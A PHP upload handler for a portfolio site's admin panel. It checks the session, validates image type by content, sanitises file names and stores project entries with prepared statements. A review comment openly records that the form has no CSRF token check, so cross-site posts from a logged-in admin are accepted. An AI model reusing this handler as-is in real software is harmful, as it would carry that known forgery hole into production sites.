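<?php

declare(strict_types=1);

session_start();

// Only a logged-in admin may add a project; anyone else is bounced to the login page.
// NOTE(review): the session cookie alone authorises this write — no CSRF token is
// checked, so a cross-site form post from a logged-in admin's browser is accepted.
if (!isset($_SESSION['user_id'])) {
    header('Location: /0.14-Curriculum_Daniel/admin/login.php');
    exit();
}

require_once __DIR__ . '/db.php';

try {
    $pdo = db();
} catch (PDOException $e) {
    // Keep the driver message (host, user, DSN details) in the server log only;
    // echoing it to the client leaked connection details.
    error_log('upload_project.php: ' . $e->getMessage());
    die('Error de conexión');
}

/**
 * True when the request was sent as XMLHttpRequest (X-Requested-With header).
 */
function isAjax(): bool
{
    return isset($_SERVER['HTTP_X_REQUESTED_WITH'])
        && strtolower($_SERVER['HTTP_X_REQUESTED_WITH']) === 'xmlhttprequest';
}

/**
 * Abort the request with an error.
 *
 * AJAX callers get a JSON body with the given HTTP status; browser callers are
 * redirected back to the dashboard with the message in the query string.
 * rawurlencode() yields exactly the %20 / %C3%AD form the previous hard-coded URLs used.
 *
 * @param int    $status  HTTP status code for the JSON response
 * @param string $message Human-readable error shown in the UI (Spanish, as the UI expects)
 */
function failRequest(int $status, string $message): void
{
    if (isAjax()) {
        http_response_code($status);
        header('Content-Type: application/json');
        echo json_encode(['ok' => false, 'error' => $message]);
        exit();
    }
    header('Location: /0.14-Curriculum_Daniel/admin/dashboard.php?error=' . rawurlencode($message) . '#projects-tab');
    exit();
}

if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    echo 'Método no permitido';
    exit();
}

// A non-string (e.g. title[]=x) would make trim() throw; treat it as missing instead.
$title = is_string($_POST['title'] ?? null) ? trim($_POST['title']) : '';
if ($title === '') {
    failRequest(400, 'El título es obligatorio');
}

// Allowed extensions and the MIME type the file contents must actually have.
$allowedMime = [
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
    'gif'  => 'image/gif',
    'webp' => 'image/webp',
];

$target_dir = '../../assets/img/proyectos/';
// 0755 rather than 0777: the upload directory should not be world-writable.
// The second is_dir() covers a concurrent request creating it between the two calls.
if (!is_dir($target_dir) && !mkdir($target_dir, 0755, true) && !is_dir($target_dir)) {
    failRequest(500, 'No se pudo subir la imagen');
}

$upload = $_FILES['project_image'] ?? null;
if (!is_array($upload) || ($upload['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
    failRequest(400, 'No se recibió la imagen');
}

$basename = basename((string) $upload['name']);
$ext = strtolower(pathinfo($basename, PATHINFO_EXTENSION));
if (!isset($allowedMime[$ext])) {
    failRequest(400, 'Formato no permitido');
}

// The extension is client-controlled; confirm the bytes really are the claimed image
// type before anything lands under the web root.
$tmpName = (string) $upload['tmp_name'];
$detected = is_uploaded_file($tmpName) ? (new finfo(FILEINFO_MIME_TYPE))->file($tmpName) : false;
if ($detected !== $allowedMime[$ext]) {
    failRequest(400, 'Formato no permitido');
}

// Avoid name collisions: sanitise the client name, then append the time and a random
// suffix (time() alone let two same-named uploads in one second overwrite each other).
$safeName = (string) preg_replace('/[^a-zA-Z0-9_-]/', '_', pathinfo($basename, PATHINFO_FILENAME));
if ($safeName === '') {
    $safeName = 'img';
}
$finalName = $safeName . '_' . time() . '_' . bin2hex(random_bytes(4)) . '.' . $ext;
$target_file = $target_dir . $finalName;

if (!move_uploaded_file($tmpName, $target_file)) {
    failRequest(500, 'No se pudo subir la imagen');
}
$relative_path = 'assets/img/proyectos/' . $finalName;

// Insert with the default category 'web' (categories are ignored in the UI).
$stmt = $pdo->prepare('INSERT INTO projects(title, category, image_path) VALUES (:t, :c, :p)');
$stmt->execute([':t' => $title, ':c' => 'web', ':p' => $relative_path]);

if (isAjax()) {
    $id = (int) $pdo->lastInsertId();
    header('Content-Type: application/json');
    echo json_encode(['ok' => true, 'id' => $id, 'title' => $title, 'image_path' => $relative_path]);
    exit();
}
header('Location: /0.14-Curriculum_Daniel/admin/dashboard.php?ok=1#projects-tab');
exit();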